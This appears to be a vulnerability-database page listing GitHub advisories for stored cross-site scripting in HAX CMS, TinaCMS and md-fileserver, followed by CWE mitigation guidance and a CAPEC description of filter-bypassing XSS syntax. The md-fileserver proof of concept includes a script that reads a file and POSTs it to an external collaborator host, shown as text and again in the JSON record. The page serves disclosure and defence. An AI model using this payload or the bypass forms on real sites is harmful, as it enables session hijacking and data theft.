"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-2VC4-3HX7-V7V7
Vulnerability from github – Published: 2025-06-09 17:43 – Updated: 2025-06-09 21:43Summary
The application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The 'saveNode' and 'saveManifest' endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site.
Although the application does not allow users to supply a 'script' tag, it does allow the use of other HTML tags to run JavaScript.
Affected Resources
- Operations.php:258
saveManifest() - Operations.php:868
saveNode() https://<site>/<user>/system/api/saveNodehttps://<site>/<user>/system/api/saveManifest
Impact
An authenticated attacker can use the site editor and settings editor to store malicious payloads in a HAX site which execute arbitrary JavaScript when a user visits the site. This can be used to steal a user's session cookie or other sensitive data.
PoCs
saveNode
To replicate this vulnerability, an attacker can use the "View Source" functionality within the site editor to enter a malicious payload.
- Select "View Source" within the HAX site editor and enter an XSS payload that does not use the "script" HTML tag.
- Select "Update HTML" and observe the resulting alert.
saveManifest
To exploit the 'SaveManifest' endpoint, an attacker can insert executable code into the URL field of the site settings editor: any payload added this way will execute when the site is loaded.
- Open the site settings editor.
- Add JavaScript code to the URL field under the "Theme" header.
- Reload the page to run the script.
- The resulting page source will contain the script.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "elmsln/haxcms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-49137"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-80",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2025-06-09T17:43:37Z",
"nvd_published_at": "2025-06-09T21:15:46Z",
"severity": "HIGH"
},
"details": "### Summary\n\nThe application does not sufficiently sanitize user input, allowing for the execution of arbitrary JavaScript code. The \u0027saveNode\u0027 and \u0027saveManifest\u0027 endpoints take user input and store it in the JSON schema for the site. This content is then rendered in the generated HAX site.\n\nAlthough the application does not allow users to supply a \u0027script\u0027 tag, it does allow the use of other HTML tags to run JavaScript.\n\n### Affected Resources\n\n- [Operations.php:258](https://github.com/haxtheweb/haxcms-php/blob/master/system/backend/php/lib/Operations.php#L258) `saveManifest()`\n- [Operations.php:868](https://github.com/haxtheweb/haxcms-php/blob/master/system/backend/php/lib/Operations.php#L868) `saveNode()`\n- `https://\u003csite\u003e/\u003cuser\u003e/system/api/saveNode`\n- `https://\u003csite\u003e/\u003cuser\u003e/system/api/saveManifest`\n\n### Impact\n\nAn authenticated attacker can use the site editor and settings editor to store malicious payloads in a HAX site which execute arbitrary JavaScript when a user visits the site. This can be used to steal a user\u0027s session cookie or other sensitive data.\n\n### PoCs\n\n#### saveNode\n\nTo replicate this vulnerability, an attacker can use the \"View Source\" functionality within the site editor to enter a malicious payload.\n\n1. Select \"View Source\" within the HAX site editor and enter an XSS payload that does not use the \"script\" HTML tag.\n\n\n\n3. Select \"Update HTML\" and observe the resulting alert.\n\n\n\n\n\n#### saveManifest\n\nTo exploit the \u0027SaveManifest\u0027 endpoint, an attacker can insert executable code into the URL field of the site settings editor: any payload added this way will execute when the site is loaded.\n\n1. Open the site settings editor.\n\n\n\n3. Add JavaScript code to the URL field under the \"Theme\" header.\n\n\n\n5. Reload the page to run the script.\n\n\n\n7. The resulting page source will contain the script.\n\n",
"id": "GHSA-2vc4-3hx7-v7v7",
"modified": "2025-06-09T21:43:59Z",
"published": "2025-06-09T17:43:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-2vc4-3hx7-v7v7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49137"
},
{
"type": "WEB",
"url": "https://github.com/haxtheweb/haxcms-php/commit/0dd3e98fe2fadd0793b667d4af2aac230980e0f8"
},
{
"type": "PACKAGE",
"url": "https://github.com/haxtheweb/issues"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Hax CMS Stored Cross-Site Scripting vulnerability"
}
GHSA-2VCC-5V34-9JC8
Vulnerability from github – Published: 2026-06-18 13:07 – Updated: 2026-06-18 13:07TinaCMS rich-text parsing and the default link/image renderers did not sanitize the url field on Slate link/image nodes. Content containing javascript: or data:text/html URLs — including case-variant, whitespace-padded, and control-character-obfuscated forms — is rendered into href/src and executes when the content is viewed. Any actor able to author rich-text content (for example a lower-privileged editor, or imported/external content) can achieve stored XSS against editors and site viewers.
Fixed in https://github.com/tinacms/tinacms/pull/7056 via a sanitizeUrl() helper (case-insensitive, whitespace/control-character-normalized scheme allow-list) applied recursively to Slate trees at parse time and in the default rich-text rendering.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "tinacms"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.9.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@tinacms/mdx"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55661"
],
"database_specific": {
"cwe_ids": [
"CWE-79",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T13:07:05Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "TinaCMS rich-text parsing and the default link/image renderers did not sanitize the `url` field on Slate link/image nodes. Content containing `javascript:` or `data:text/html` URLs \u2014 including case-variant, whitespace-padded, and control-character-obfuscated forms \u2014 is rendered into `href`/`src` and executes when the content is viewed. Any actor able to author rich-text content (for example a lower-privileged editor, or imported/external content) can achieve stored XSS against editors and site viewers.\n\nFixed in https://github.com/tinacms/tinacms/pull/7056 via a `sanitizeUrl()` helper (case-insensitive, whitespace/control-character-normalized scheme allow-list) applied recursively to Slate trees at parse time and in the default rich-text rendering.",
"id": "GHSA-2vcc-5v34-9jc8",
"modified": "2026-06-18T13:07:05Z",
"published": "2026-06-18T13:07:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2vcc-5v34-9jc8"
},
{
"type": "WEB",
"url": "https://github.com/tinacms/tinacms/pull/7056"
},
{
"type": "PACKAGE",
"url": "https://github.com/tinacms/tinacms"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "TinaCMS rich-text (slatejson) rendering does not sanitize link/image URLs, allowing stored XSS via dangerous URL schemes"
}
GHSA-32Q2-HHR5-6QVV
Vulnerability from github – Published: 2026-05-21 17:57 – Updated: 2026-06-09 18:41Summary
A cross-site scripting (XSS) vulnerability exists in the application’s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML—including tags—is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.
Details
An attacker can craft malicious Markdown content containing tags or event handlers (e.g., ). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim’s browser.
Vulnerable Components
config.js → markdownIt: { html: true } (Lines 26–30) The Markdown renderer is explicitly configured to allow raw HTML.
lib/markd.js (Lines 33–58) Renders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.
lib/pages/template.html The rendered Markdown is injected into the HTML template using <%= markdown %> without sanitization or output encoding.
PoC
Create a pwn.md
# Hello
<script>
fetch('/etc/passwd', { credentials: 'include' })
.then(r => r.text())
.then(t => fetch('https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil', { method: 'POST', body: t }));
</script>
Open it on browser.
View the HTTP request in Burp Collaborator.
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to: - Session hijacking - Account takeover - Credential theft - Defacement or injection of malicious content - Exfiltration of sensitive data via API tokens, CSRF tokens, or user information
This affects all users who can view Markdown content within the application.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "md-fileserver"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.10.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46492"
],
"database_specific": {
"cwe_ids": [
"CWE-80",
"CWE-87"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-21T17:57:32Z",
"nvd_published_at": "2026-06-09T17:17:33Z",
"severity": "HIGH"
},
"details": "### Summary\nA cross-site scripting (XSS) vulnerability exists in the application\u2019s Markdown rendering logic. When user-supplied Markdown content is rendered, embedded raw HTML\u2014including \u003cscript\u003e tags\u2014is processed and injected into the resulting page without sanitization, allowing arbitrary JavaScript execution in the context of the affected domain.\n\n### Details\nAn attacker can craft malicious Markdown content containing \u003cscript\u003e tags or event handlers (e.g., \u003cimg onerror=...\u003e). When this Markdown is viewed or previewed, the embedded JavaScript executes in the victim\u2019s browser.\n\n### Vulnerable Components\nconfig.js \u2192 markdownIt: { html: true } (Lines 26\u201330)\nThe Markdown renderer is explicitly configured to allow raw HTML.\n\nlib/markd.js (Lines 33\u201358)\nRenders Markdown content without sanitizing HTML, allowing unsafe tags and attributes to remain in the output.\n\nlib/pages/template.html\nThe rendered Markdown is injected into the HTML template using \u003c%= markdown %\u003e without sanitization or output encoding.\n\n### PoC\nCreate a pwn.md \n```\n# Hello\n\n\u003cscript\u003e\n fetch(\u0027/etc/passwd\u0027, { credentials: \u0027include\u0027 })\n .then(r =\u003e r.text())\n .then(t =\u003e fetch(\u0027https://79evxsw3m08qfyvxluebgl0pyg47szgo.oastify.com/exfil\u0027, { method: \u0027POST\u0027, body: t }));\n\u003c/script\u003e\n\n```\nOpen it on browser.\n\u003cimg width=\"944\" height=\"238\" alt=\"image\" src=\"https://github.com/user-attachments/assets/cd9e1396-9f4b-4a4b-bc2a-d7530c0c00ac\" /\u003e\nView the HTTP request in Burp Collaborator.\n\u003cimg width=\"1328\" height=\"468\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9faa65ad-73ec-42d0-9ce3-ea78b15294d8\" /\u003e\n\n\n### Impact\nSuccessful exploitation allows an attacker to execute arbitrary JavaScript in the victim\u2019s browser, leading to:\n- Session hijacking\n- Account takeover\n- Credential theft\n- Defacement or injection of malicious content\n- Exfiltration of sensitive data via API tokens, CSRF tokens, or user information\n\nThis affects all users who can view Markdown content within the application.",
"id": "GHSA-32q2-hhr5-6qvv",
"modified": "2026-06-09T18:41:40Z",
"published": "2026-05-21T17:57:32Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/commenthol/md-fileserver/security/advisories/GHSA-32q2-hhr5-6qvv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46492"
},
{
"type": "PACKAGE",
"url": "https://github.com/commenthol/md-fileserver"
},
{
"type": "WEB",
"url": "https://github.com/commenthol/md-fileserver/releases/tag/v1.10.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "md-fileserver: Stored/Reflected XSS when viewing Markdown (raw HTML allowed)"
}
Mitigation
Resolve all input to absolute or canonical representations before processing.
Mitigation
Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.
Mitigation MIT-30.1
Strategy: Output Encoding
- Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.
- The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks.
Mitigation MIT-43
With Struts, write all data from form beans with the bean's filter attribute set to true.
Mitigation MIT-31
Strategy: Attack Surface Reduction
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XmlHttpRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
CAPEC-199: XSS Using Alternate Syntax
An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the "script" tag using the alternate forms of "Script" or "ScRiPt" may bypass filters where "script" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.